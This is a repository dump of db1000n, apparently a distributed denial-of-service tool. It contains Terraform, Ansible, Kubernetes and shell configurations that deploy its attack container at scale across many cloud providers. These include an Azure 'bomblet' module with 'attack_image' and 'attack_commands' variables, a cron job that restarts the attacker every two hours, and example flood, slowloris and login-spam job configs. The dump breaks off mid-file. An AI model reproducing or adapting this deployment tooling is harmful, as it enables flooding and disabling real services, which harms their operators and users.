├── openvpn └── .gitkeep ├── .gitattributes ├── .github ├── CODEOWNERS ├── issue_template.md ├── workflows │ ├── gh-pages.yml │ ├── kubernetes-lint.yaml │ ├── docker-lint.yaml │ ├── terraformci.yaml │ ├── test.yaml │ ├── markdownlint.yaml │ ├── test-installer.yaml │ ├── goreleaser-action.yaml │ ├── ko-release.yaml │ ├── ko-build.yaml │ ├── golangci-lint.yaml │ ├── release-docker-advanced.yaml │ └── codeql-analysis.yml └── pull_request_template.md ├── Procfile ├── ansible ├── aws │ ├── AWS.pub │ ├── README.md │ └── aws-provisioning.yaml └── linux │ ├── inventory.cfg.example │ ├── countries.txt │ ├── README.md │ └── setup.yaml ├── terraform ├── aws_eks │ ├── data.tf │ ├── modules │ │ ├── kubernetes │ │ │ ├── data.tf │ │ │ ├── providers.tf │ │ │ └── variables.tf │ │ ├── network │ │ │ ├── data.tf │ │ │ ├── variables.tf │ │ │ ├── outputs.tf │ │ │ └── main.tf │ │ ├── eks-nodes │ │ │ ├── outputs.tf │ │ │ ├── data.tf │ │ │ └── variables.tf │ │ └── eks-cluster │ │ │ ├── outputs.tf │ │ │ ├── variables.tf │ │ │ ├── data.tf │ │ │ └── main.tf │ ├── providers.tf │ ├── scripts │ │ └── node-user-data.sh │ ├── versions.tf │ ├── outputs.tf │ ├── variables.tf │ ├── main.tf │ └── README.md ├── vultr │ ├── outputs.tf │ ├── scripts │ │ └── deploy.sh │ ├── variable.tf │ ├── main.tf │ └── README.md ├── hetzner_cloud │ ├── outputs.tf │ ├── terraform.tfvars │ ├── provider.tf │ ├── main.tf │ ├── variables.tf │ ├── user_data.yml │ └── README.md ├── aws_lightsail │ ├── terraform.tfvars │ ├── provider.tf │ ├── README.md │ ├── main.tf │ └── variables.tf ├── digital_ocean │ ├── terraform.tfvars │ ├── provider.tf │ ├── main.tf │ ├── README.md │ └── variables.tf ├── azure │ ├── requirements.tf │ ├── bomblet │ │ ├── requirements.tf │ │ ├── variables.tf │ │ └── main.tf │ ├── variables.tf │ ├── README.md │ └── main.tf ├── aws_ec2 │ ├── ireland.tfvars │ ├── README.md │ └── variables.tf ├── gcp_expressvpn │ ├── versions.tf │ ├── variables.tf │ ├── README.md │ └── main.tf └── heroku │ ├── provider.tf │ ├── terraform.tfvars │ ├── main.tf │ ├── variables.tf │ └── README.md ├── db1000n.rb ├── docs ├── license.md ├── advanced-docs │ ├── terraform │ │ ├── azure.md │ │ ├── vultr.md │ │ ├── heroku.md │ │ ├── aws_ec2.md │ │ ├── aws_eks.md │ │ ├── gcp.md │ │ ├── aws_lightsail.md │ │ ├── digital-ocean.md │ │ └── hetzner-cloud.md │ ├── kubernetes │ │ ├── helm-charts.md │ │ └── manifests.md │ ├── pull-request-template.md │ ├── docker-vpn.md │ └── advanced-and-devs.md ├── over-the-air.md ├── index.md └── faq.md ├── kubernetes ├── helm-charts │ ├── Chart.yaml │ ├── .helmignore │ ├── README.md │ ├── values.yaml │ └── templates │ │ ├── deployment.yaml │ │ └── _helpers.tpl └── manifests │ ├── deployment.yaml │ ├── daemonset.yaml │ └── README.md ├── examples ├── config │ ├── http-host.yaml │ ├── advanced │ │ ├── packetgen-udp.yaml │ │ ├── packetgen-tcp.yaml │ │ ├── locker.yaml │ │ ├── packetgen-dnsblast.yaml │ │ ├── packetgen.yaml │ │ ├── packetgen-ipv6.yaml │ │ ├── packetgen-slowloris.yaml │ │ └── qrator.yaml │ ├── http-login.json │ └── js.yaml └── docker │ └── static-docker-compose.yml ├── src ├── utils │ ├── utils_windows.go │ ├── ota │ │ ├── restart.go │ │ ├── shared.go │ │ ├── restart_windows.go │ │ ├── restart_darwin.go │ │ ├── restart_linux.go │ │ ├── shared_test.go │ │ ├── README.md │ │ └── ota.go │ ├── locker.go │ ├── metrics │ │ ├── stats_tracker.go │ │ ├── serve.go │ │ ├── accumulator.go │ │ ├── stats.go │ │ ├── reporter.go │ │ └── metrics.go │ ├── templates │ │ ├── math.go │ │ └── encoding.go │ ├── backoff.go │ ├── utils_unix.go │ ├── proxy.go │ └── crypto.go ├── job │ ├── config │ │ ├── defaultconfig.go │ │ └── updater.go │ ├── rawnet.go │ └── complex.go └── core │ └── packetgen │ ├── raw_conn_windows.go │ ├── raw_conn_unix.go │ ├── serialization.go │ ├── link.go │ ├── packetgen.go │ ├── network.go │ ├── connection.go │ └── transport.go ├── .ko.yaml ├── pyproject.toml ├── .gitignore ├── Dockerfile ├── README.md ├── testconfig.yaml ├── LICENSE ├── golangci-lint.nix ├── .goreleaser.yaml ├── Makefile ├── testconfig.json ├── go.mod ├── install.sh ├── mkdocs.yml └── scripts └── StartDB1000N.bat /openvpn/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | *.go text eol=lf -------------------------------------------------------------------------------- /.github/CODEOWNERS: -------------------------------------------------------------------------------- 1 | * @Arriven 2 | -------------------------------------------------------------------------------- /Procfile: -------------------------------------------------------------------------------- 1 | worker: bin/db1000n 2 | -------------------------------------------------------------------------------- /ansible/aws/AWS.pub: -------------------------------------------------------------------------------- 1 | -- here you put your public key -- -------------------------------------------------------------------------------- /terraform/aws_eks/data.tf: -------------------------------------------------------------------------------- 1 | data "aws_caller_identity" "current" {} -------------------------------------------------------------------------------- /terraform/aws_eks/modules/kubernetes/data.tf: -------------------------------------------------------------------------------- 1 | data "aws_region" "current" {} -------------------------------------------------------------------------------- /db1000n.rb: -------------------------------------------------------------------------------- 1 | all 2 | exclude_rule 'MD046' 3 | exclude_rule 'MD007' 4 | exclude_rule 'MD013' 5 | -------------------------------------------------------------------------------- /terraform/vultr/outputs.tf: -------------------------------------------------------------------------------- 1 | output "ip" { 2 | value = vultr_instance.my_instance[*].main_ip 3 | } 4 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/outputs.tf: -------------------------------------------------------------------------------- 1 | output "ips" { 2 | value = hcloud_server.server[*].ipv4_address 3 | } -------------------------------------------------------------------------------- /docs/license.md: -------------------------------------------------------------------------------- 1 | # License 2 | 3 | {% 4 | include-markdown "../LICENSE" 5 | start="MIT License" 6 | %} -------------------------------------------------------------------------------- /terraform/aws_eks/providers.tf: -------------------------------------------------------------------------------- 1 | provider "aws" { 2 | region = var.region 3 | profile = var.profile 4 | } -------------------------------------------------------------------------------- /terraform/aws_eks/modules/network/data.tf: -------------------------------------------------------------------------------- 1 | data "aws_availability_zones" "available" { 2 | state = "available" 3 | } -------------------------------------------------------------------------------- /terraform/aws_lightsail/terraform.tfvars: -------------------------------------------------------------------------------- 1 | scale = 1 2 | power = "medium" 3 | region_name = "eu-central-1" 4 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/terraform.tfvars: -------------------------------------------------------------------------------- 1 | instance_count = 1 2 | location = "hel1" 3 | server_type = "cx11" 4 | -------------------------------------------------------------------------------- /terraform/digital_ocean/terraform.tfvars: -------------------------------------------------------------------------------- 1 | instance_count = 1 2 | instance_size_slug = "professional-xs" 3 | region = "nyc" 4 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/Chart.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v2 2 | name: db1000n 3 | description: db1000n Helm chart 4 | 5 | type: application 6 | version: 1.0.0 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/azure.md: -------------------------------------------------------------------------------- 1 | # Azure 2 | 3 | {% 4 | include "../../../terraform/azure/README.md" 5 | start="# Deploy via Azure" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/vultr.md: -------------------------------------------------------------------------------- 1 | # Vultr 2 | 3 | {% 4 | include "../../../terraform/vultr/README.md" 5 | start="# Vultr deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/heroku.md: -------------------------------------------------------------------------------- 1 | # Heroku 2 | 3 | {% 4 | include "../../../terraform/heroku/README.md" 5 | start="# Heroku deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/over-the-air.md: -------------------------------------------------------------------------------- 1 | # Over the air updates 2 | 3 | {% 4 | include-markdown "../src/utils/ota/README.md" 5 | start="# Over-the-air updates" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/aws_ec2.md: -------------------------------------------------------------------------------- 1 | # AWS EC2 2 | 3 | {% 4 | include "../../../terraform/aws_ec2/README.md" 5 | start="# AWS EC2 deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/aws_eks.md: -------------------------------------------------------------------------------- 1 | # AWS EKS 2 | 3 | {% 4 | include "../../../terraform/aws_eks/README.md" 5 | start="# AWS EKS deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/gcp.md: -------------------------------------------------------------------------------- 1 | # GCP 2 | 3 | {% 4 | include "../../../terraform/gcp_expressvpn/README.md" 5 | start="# GCP + ExpressVPN deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/kubernetes/helm-charts.md: -------------------------------------------------------------------------------- 1 | # Helm charts 2 | 3 | {% 4 | include "../../../kubernetes/helm-charts/README.md" 5 | start="# db1000n Helm charts" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/pull-request-template.md: -------------------------------------------------------------------------------- 1 | # Pull request template 2 | 3 | {% 4 | include-markdown "../../.github/pull_request_template.md" 5 | start="# Description" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/aws_lightsail.md: -------------------------------------------------------------------------------- 1 | # AWS Lightsail 2 | 3 | {% 4 | include "../../../terraform/aws_lightsail/README.md" 5 | start="# AWS Lightsail deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/digital-ocean.md: -------------------------------------------------------------------------------- 1 | # Digital Ocean 2 | 3 | {% 4 | include "../../../terraform/digital_ocean/README.md" 5 | start="# Digital Ocean deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/hetzner-cloud.md: -------------------------------------------------------------------------------- 1 | # Hetzner Cloud 2 | 3 | {% 4 | include "../../../terraform/hetzner_cloud/README.md" 5 | start="# Hetzner Cloud deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /terraform/azure/requirements.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | azurerm = { 4 | source = "hashicorp/azurerm" 5 | version = "=2.97.0" 6 | } 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /docs/advanced-docs/kubernetes/manifests.md: -------------------------------------------------------------------------------- 1 | # Manifests install 2 | 3 | {% include 4 | "../../../kubernetes/manifests/README.md" 5 | start="# Kubernetes manifests to install" 6 | %} 7 | -------------------------------------------------------------------------------- /terraform/aws_eks/scripts/node-user-data.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -xe 2 | 3 | sudo /etc/eks/bootstrap.sh --apiserver-endpoint "${CLUSTER_ENDPOINT}" --b64-cluster-ca "${CLUSTER_CA_DATA}" "${CLUSTER_NAME}" 4 | -------------------------------------------------------------------------------- /terraform/azure/bomblet/requirements.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | azurerm = { 4 | source = "hashicorp/azurerm" 5 | version = "=2.97.0" 6 | } 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /terraform/aws_ec2/ireland.tfvars: -------------------------------------------------------------------------------- 1 | # Make changes in this file 2 | region = "eu-west-1" 3 | name = "ir-db1000n" 4 | desired_capacity = 2 5 | min_size = 0 6 | max_size = 32 7 | zones = 2 8 | -------------------------------------------------------------------------------- /terraform/gcp_expressvpn/versions.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | google = { 4 | source = "hashicorp/google" 5 | } 6 | } 7 | } 8 | 9 | provider "google" { 10 | project = var.project_id 11 | } 12 | -------------------------------------------------------------------------------- /examples/config/http-host.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: http 3 | args: 4 | request: 5 | method: GET 6 | path: http://lolkek/test 7 | client: 8 | static_host: 9 | addr: 127.0.0.1:8080 10 | -------------------------------------------------------------------------------- /.github/issue_template.md: -------------------------------------------------------------------------------- 1 | ## Expected Behavior 2 | 3 | 4 | ## Actual Behavior 5 | 6 | 7 | ## Steps to Reproduce the Problem 8 | 9 | 1. 10 | 2. 11 | 3. 12 | 13 | ## Specifications 14 | 15 | - Version: 16 | - Platform: 17 | - Subsystem: 18 | -------------------------------------------------------------------------------- /terraform/aws_eks/versions.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_version = ">= 1.0.9" 3 | required_providers { 4 | aws = { 5 | version = "= 4.5.0" 6 | } 7 | kubernetes = { 8 | version = ">= 2.9.0" 9 | } 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /ansible/linux/inventory.cfg.example: -------------------------------------------------------------------------------- 1 | [target] 2 | ansible_connection=ssh ansible_ssh_user= 3 | 4 | [target:vars] 5 | ansible_python_interpreter=/usr/bin/python3 6 | setup_vpn= 7 | expressvpn_activation_code= 8 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-nodes/outputs.tf: -------------------------------------------------------------------------------- 1 | output "security_group_id" { 2 | description = "EKS node Security group ID" 3 | value = aws_security_group.eks_nodes.id 4 | } 5 | 6 | output "worker_node_iam_role_arn" { 7 | value = aws_iam_role.eks_worker_node.arn 8 | } -------------------------------------------------------------------------------- /terraform/hetzner_cloud/provider.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | hcloud = { 4 | source = "hetznercloud/hcloud" 5 | version = "~> 1.0" 6 | } 7 | } 8 | required_version = "~> 1.0" 9 | } 10 | 11 | provider "hcloud" { 12 | token = var.hcloud_token 13 | } 14 | -------------------------------------------------------------------------------- /terraform/heroku/provider.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | heroku = { 4 | source = "heroku/heroku" 5 | version = "~> 5.0" 6 | } 7 | } 8 | required_version = "~> 1.0" 9 | } 10 | 11 | provider "heroku" { 12 | email = var.email 13 | api_key = var.api_key 14 | } 15 | -------------------------------------------------------------------------------- /terraform/aws_lightsail/provider.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | awslightsail = { 4 | source = "DeYoungTech/awslightsail" 5 | version = "0.7.0" 6 | } 7 | } 8 | required_version = "~> 1.0" 9 | } 10 | 11 | provider "awslightsail" { 12 | region = var.region_name 13 | } 14 | -------------------------------------------------------------------------------- /terraform/digital_ocean/provider.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | digitalocean = { 4 | source = "digitalocean/digitalocean" 5 | version = "~> 2.0" 6 | } 7 | } 8 | required_version = "~> 1.0" 9 | } 10 | 11 | provider "digitalocean" { 12 | token = var.do_token 13 | } 14 | -------------------------------------------------------------------------------- /terraform/heroku/terraform.tfvars: -------------------------------------------------------------------------------- 1 | # Latest release: https://github.com/Arriven/db1000n/releases/latest 2 | app_version = "0.8.20" 3 | 4 | # If you want to use more that 1 instance and larger instance type 5 | # make sure that your Credit Card is attached to the account 6 | instance_count = 1 7 | instance_type = "free" 8 | -------------------------------------------------------------------------------- /src/utils/utils_windows.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import "syscall" 4 | 5 | func UpdateRLimit() error { 6 | return nil 7 | } 8 | 9 | func BindToInterface(name string) func(network, address string, conn syscall.RawConn) error { 10 | return func(network, address string, conn syscall.RawConn) error { 11 | return nil 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-udp.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | connection: 5 | type: net 6 | args: 7 | protocol: "udp" 8 | address: "localhost:1234" 9 | packet: 10 | payload: 11 | type: raw 12 | data: 13 | payload: "test" 14 | -------------------------------------------------------------------------------- /terraform/aws_lightsail/README.md: -------------------------------------------------------------------------------- 1 | # AWS Lightsail deployment 2 | 3 | ## Requirements 4 | 5 | - AWS account 6 | - `terraform` (1.0+) installed 7 | 8 | ## Deploy 9 | 10 | To deploy: 11 | 12 | ```sh 13 | terraform init 14 | terraform plan 15 | terraform apply 16 | ``` 17 | 18 | ## Destroy 19 | 20 | To destroy: 21 | 22 | ```sh 23 | terraform destroy 24 | ``` 25 | -------------------------------------------------------------------------------- /src/utils/ota/restart.go: -------------------------------------------------------------------------------- 1 | //go:build !linux && !darwin && !windows 2 | // +build !linux,!darwin,!windows 3 | 4 | package ota 5 | 6 | import ( 7 | "fmt" 8 | "runtime" 9 | 10 | "go.uber.org/zap" 11 | ) 12 | 13 | func restart(logger *zap.Logger, extraArgs ...string) error { 14 | return fmt.Errorf("restart on the %s system is not available", runtime.GOOS) 15 | } 16 | -------------------------------------------------------------------------------- /terraform/vultr/scripts/deploy.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | 3 | apt install -y vnstat 4 | 5 | container_name="db1000n" 6 | docker_cmd="docker run -d -it --rm --name=${container_name} -e ENABLE_PRIMITIVE=false --pull always ghcr.io/arriven/db1000n" 7 | 8 | ${docker_cmd} 9 | 10 | echo "0 */2 * * * docker kill ${container_name} || true && ${docker_cmd}" >> cronjob 11 | crontab cronjob 12 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-tcp.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | connection: 5 | type: net 6 | args: 7 | protocol: "tcp" 8 | address: "localhost:1234" 9 | tls_config: 10 | insecure_skip_verify: true 11 | packet: 12 | payload: 13 | type: raw 14 | data: 15 | payload: "test" 16 | -------------------------------------------------------------------------------- /terraform/vultr/variable.tf: -------------------------------------------------------------------------------- 1 | 2 | variable "region" { 3 | default = "icn" # Seoul, South Korea 4 | } 5 | 6 | variable "plan" { 7 | default = "vc2-1c-1gb" 8 | } 9 | 10 | variable "app" { 11 | description = "Docker Ubuntu 20.04" 12 | default = "37" 13 | } 14 | 15 | variable "key" { 16 | description = "Path to SSH key" 17 | type = string 18 | } 19 | 20 | variable "num_inst" { 21 | type = number 22 | } 23 | -------------------------------------------------------------------------------- /src/utils/locker.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import "sync" 4 | 5 | type Locker struct { 6 | mutexes sync.Map // Zero value is empty and ready for use 7 | } 8 | 9 | func (m *Locker) Lock(key string) func() { 10 | value, _ := m.mutexes.LoadOrStore(key, &sync.Mutex{}) 11 | 12 | mtx, ok := value.(*sync.Mutex) 13 | if ok { 14 | mtx.Lock() 15 | 16 | return func() { mtx.Unlock() } 17 | } 18 | 19 | return func() {} 20 | } 21 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/kubernetes/providers.tf: -------------------------------------------------------------------------------- 1 | provider "kubernetes" { 2 | host = var.cluster_endpoint 3 | cluster_ca_certificate = base64decode(var.cluster_ca_data) 4 | # generate token 5 | exec { 6 | api_version = "client.authentication.k8s.io/v1alpha1" 7 | command = "aws" 8 | args = ["--profile", var.profile, "eks", "get-token", "--cluster-name", var.cluster_name] 9 | 10 | } 11 | } -------------------------------------------------------------------------------- /.github/workflows/gh-pages.yml: -------------------------------------------------------------------------------- 1 | name: PushToGithubPages 2 | 3 | on: 4 | push: 5 | tags: ["**"] 6 | branches: ["main"] 7 | 8 | jobs: 9 | deploy: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - uses: actions/checkout@v2 13 | - uses: actions/setup-python@v2 14 | with: 15 | python-version: 3.x 16 | - run: pip install poetry 17 | - run: poetry update 18 | - run: poetry run mkdocs gh-deploy --force 19 | -------------------------------------------------------------------------------- /.github/workflows/kubernetes-lint.yaml: -------------------------------------------------------------------------------- 1 | name: kubernetes-lint 2 | 3 | on: 4 | pull_request: 5 | branches: 6 | - main 7 | paths: 8 | - 'kubernetes/manifests/**' 9 | 10 | jobs: 11 | kubeval: 12 | runs-on: ubuntu-latest 13 | steps: 14 | - name: Checkout 15 | uses: actions/checkout@v2 16 | - name: Kubeval 17 | uses: instrumenta/kubeval-action@master 18 | with: 19 | files: kubernetes/manifests/ 20 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/.helmignore: -------------------------------------------------------------------------------- 1 | # Patterns to ignore when building packages. 2 | # This supports shell glob matching, relative path matching, and 3 | # negation (prefixed with !). Only one pattern per line. 4 | .DS_Store 5 | # Common VCS dirs 6 | .git/ 7 | .gitignore 8 | .bzr/ 9 | .bzrignore 10 | .hg/ 11 | .hgignore 12 | .svn/ 13 | # Common backup files 14 | *.swp 15 | *.bak 16 | *.tmp 17 | *.orig 18 | *~ 19 | # Various IDEs 20 | .project 21 | .idea/ 22 | *.tmproj 23 | .vscode/ 24 | -------------------------------------------------------------------------------- /examples/config/http-login.json: -------------------------------------------------------------------------------- 1 | { 2 | "jobs": [ 3 | { 4 | "type": "http", 5 | "args": { 6 | "request": { 7 | "method": "POST", 8 | "path": "http://localhost:8080/login", 9 | "headers": { 10 | "Content-Type": "application/x-www-form-urlencoded" 11 | }, 12 | "body": "username={{random_alphanum 10}}&password={{random_payload_byte (random_int_n 5 | add 5) | base64_encode}}" 13 | } 14 | } 15 | } 16 | ] 17 | } 18 | -------------------------------------------------------------------------------- /examples/config/advanced/locker.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: lock 3 | args: 4 | key: test 5 | job: 6 | type: loop 7 | args: 8 | interval: 1s 9 | job: 10 | type: log 11 | args: 12 | text: test 13 | - type: lock 14 | args: 15 | key: test 16 | job: 17 | type: loop 18 | args: 19 | interval: 1s 20 | job: 21 | type: log 22 | args: 23 | text: test2 24 | -------------------------------------------------------------------------------- /terraform/azure/bomblet/variables.tf: -------------------------------------------------------------------------------- 1 | variable "prefix" {} 2 | 3 | variable "region" {} 4 | 5 | variable "bomblet_count" {} 6 | 7 | variable "resource_group_name" {} 8 | 9 | variable "attack_image" { 10 | default = "ghcr.io/arriven/db1000n:latest" 11 | } 12 | 13 | variable "attack_cpu" { 14 | default = "1" 15 | } 16 | 17 | variable "attack_memory" { 18 | default = "1.5" 19 | } 20 | 21 | variable "attack_environment_variables" { 22 | default = {} 23 | } 24 | 25 | variable "attack_commands" { 26 | default = null 27 | } 28 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/main.tf: -------------------------------------------------------------------------------- 1 | resource "hcloud_ssh_key" "key" { 2 | name = "db1000n_key" 3 | public_key = var.ssh_public_key 4 | } 5 | 6 | resource "hcloud_server" "server" { 7 | count = var.instance_count 8 | name = "db1000n-server-${count.index}" 9 | image = var.os_type 10 | server_type = var.server_type 11 | location = var.location 12 | ssh_keys = [hcloud_ssh_key.key.id] 13 | 14 | labels = { 15 | app = "db1000n" 16 | } 17 | 18 | user_data = file("user_data.yml") 19 | } 20 | -------------------------------------------------------------------------------- /terraform/aws_lightsail/main.tf: -------------------------------------------------------------------------------- 1 | resource "awslightsail_container_service" "service" { 2 | name = "${var.app}-service" 3 | power = var.power 4 | scale = var.scale 5 | } 6 | 7 | resource "awslightsail_container_deployment" "deployment" { 8 | container_service_name = awslightsail_container_service.service.id 9 | container { 10 | container_name = "${var.app}-deployment" 11 | image = var.image 12 | 13 | environment { 14 | key = "ENABLE_PRIMITIVE" 15 | value = "false" 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /src/utils/ota/shared.go: -------------------------------------------------------------------------------- 1 | package ota 2 | 3 | func appendArgIfNotPresent(osArgs, extraArgs []string) []string { 4 | osArgsMap := make(map[string]any, len(osArgs)) 5 | for _, osArg := range osArgs { 6 | osArgsMap[osArg] = nil 7 | } 8 | 9 | acceptedExtraArgs := make([]string, 0) 10 | 11 | for _, extraArg := range extraArgs { 12 | if _, isAlreadyOSArg := osArgsMap[extraArg]; !isAlreadyOSArg { 13 | acceptedExtraArgs = append(acceptedExtraArgs, extraArg) 14 | } 15 | } 16 | 17 | return append(osArgs, acceptedExtraArgs...) 18 | } 19 | -------------------------------------------------------------------------------- /src/job/config/defaultconfig.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "encoding/base64" 5 | ) 6 | 7 | // DefaultConfig is the config embedded into the app that it will use if not able to fetch any other config 8 | // 9 | //nolint:lll // Makes no sense splitting this into multiple lines 10 | var DefaultConfig = `` 11 | 12 | func init() { 13 | decoded, err := base64.StdEncoding.DecodeString(DefaultConfig) 14 | if err != nil { 15 | panic("Can't decode base64 encoded encrypted config") 16 | } 17 | 18 | DefaultConfig = string(decoded) 19 | } 20 | -------------------------------------------------------------------------------- /terraform/gcp_expressvpn/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project_id" { 2 | description = "GCP project id" 3 | } 4 | 5 | variable "expressvpn_key" { 6 | description = "expressvpn activation key" 7 | } 8 | 9 | variable "machine_type" { 10 | description = "GCP machine type" 11 | default = "n1-standard-1" 12 | } 13 | 14 | variable "machine_location" { 15 | description = "machine location" 16 | default = "us-central1-a" 17 | } 18 | 19 | variable "machine_count" { 20 | description = "how many VM's will be created" 21 | default = 2 22 | } -------------------------------------------------------------------------------- /terraform/aws_eks/modules/network/variables.tf: -------------------------------------------------------------------------------- 1 | variable "name" { 2 | description = "VPC name" 3 | } 4 | 5 | variable "tags" { 6 | description = "A map of tags to add to VPC" 7 | } 8 | 9 | variable "vpc_cidr_block" { 10 | description = "Base CIDR block which is divided into subnet CIDR blocks (e.g. `10.0.0.0/16`)" 11 | default = "10.0.0.0/16" 12 | } 13 | 14 | variable "amount_az" { 15 | description = "Desired Availability Zones (must be greater than 0). Number of available zones depends on region." 16 | default = "2" 17 | } -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-cluster/outputs.tf: -------------------------------------------------------------------------------- 1 | output "endpoint" { 2 | value = aws_eks_cluster.eks_cluster.endpoint 3 | } 4 | 5 | output "ca_data" { 6 | value = aws_eks_cluster.eks_cluster.certificate_authority.0.data 7 | } 8 | 9 | output "security_group_id" { 10 | description = "EKS Control Plane Security group ID" 11 | value = aws_security_group.control_plane.id 12 | } 13 | 14 | output "autoscaler_iam_role_arn" { 15 | description = "EKS cluster autoscaler role ARN" 16 | value = aws_iam_role.eks_cluster_autoscaler.arn 17 | } -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-cluster/variables.tf: -------------------------------------------------------------------------------- 1 | variable "vpc_id" { 2 | description = "VPC ID" 3 | } 4 | 5 | variable "cluster_name" { 6 | description = "EKS cluster name" 7 | } 8 | 9 | variable "cluster_version" { 10 | description = "EKS cluster version" 11 | } 12 | 13 | variable "source_security_groups" { 14 | description = "A list of source security groups which can connect to the EKS cluster" 15 | } 16 | 17 | variable "subnets" { 18 | description = "A list of subnets to place the EKS cluster" 19 | type = list(string) 20 | } 21 | 22 | -------------------------------------------------------------------------------- /.github/workflows/docker-lint.yaml: -------------------------------------------------------------------------------- 1 | name: docker-lint 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | pull_request: 8 | branches: 9 | - main 10 | paths: 11 | - "Dockerfile" 12 | - ".github/workflows/docker-lint.yaml" 13 | 14 | jobs: 15 | docker: 16 | runs-on: ubuntu-latest 17 | steps: 18 | - uses: actions/checkout@v2 19 | - uses: hadolint/hadolint-action@v1.6.0 20 | with: 21 | dockerfile: Dockerfile 22 | ignore: DL3018 23 | - name: Test image building 24 | run: make docker_build 25 | -------------------------------------------------------------------------------- /terraform/digital_ocean/main.tf: -------------------------------------------------------------------------------- 1 | resource "digitalocean_app" "db1000n" { 2 | spec { 3 | name = "db1000n" 4 | region = var.region 5 | 6 | worker { 7 | name = "db1000n-service" 8 | environment_slug = "go" 9 | instance_count = var.instance_count 10 | instance_size_slug = var.instance_size_slug 11 | 12 | env { 13 | key = "CONFIG" 14 | value = var.config_path 15 | } 16 | 17 | git { 18 | repo_clone_url = var.repo 19 | branch = "main" 20 | } 21 | } 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/network/outputs.tf: -------------------------------------------------------------------------------- 1 | output "vpc_id" { 2 | description = "VPC ID" 3 | value = aws_vpc.vpc.id 4 | } 5 | 6 | output "availability_zones" { 7 | description = "List of available Availability Zones for selected region" 8 | value = data.aws_availability_zones.available.names 9 | } 10 | 11 | output "public_subnet_ids" { 12 | description = "Public subnet ID" 13 | value = aws_subnet.public.*.id 14 | } 15 | 16 | output "private_subnet_ids" { 17 | description = "Private subnet ID" 18 | value = aws_subnet.private.*.id 19 | } -------------------------------------------------------------------------------- /examples/config/js.yaml: -------------------------------------------------------------------------------- 1 | # this scenario copies the one from https://git.gay/a/ddos-guard-bypass/src/branch/master/index.js 2 | # it is here for educational purposes only and is meant to showcase the capabilities of the tool 3 | jobs: 4 | - type: sequence 5 | args: 6 | jobs: 7 | - type: js 8 | name: testscript 9 | args: 10 | script: arg1 + arg2 11 | data: 12 | arg1: 2 13 | arg2: 4 14 | - type: log 15 | args: 16 | text: 'testscript result: {{ .Value (ctx_key "data.testscript") }}' 17 | -------------------------------------------------------------------------------- /terraform/aws_lightsail/variables.tf: -------------------------------------------------------------------------------- 1 | variable "app" { 2 | type = string 3 | default = "db1000n" 4 | } 5 | 6 | variable "image" { 7 | type = string 8 | default = "ghcr.io/arriven/db1000n:latest" 9 | } 10 | 11 | variable "scale" { 12 | type = number 13 | default = 1 14 | } 15 | 16 | # https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-creating-container-services#create-container-service-capacity 17 | variable "power" { 18 | type = string 19 | default = "medium" 20 | } 21 | 22 | variable "region_name" { 23 | type = string 24 | default = "eu-central-1" 25 | } 26 | -------------------------------------------------------------------------------- /terraform/azure/variables.tf: -------------------------------------------------------------------------------- 1 | variable "bomblet_count" { 2 | type = number 3 | default = 1 4 | description = "Number of containers per region." 5 | } 6 | 7 | variable "prefix" { 8 | default = "main" 9 | description = "The default prefix for resources." 10 | 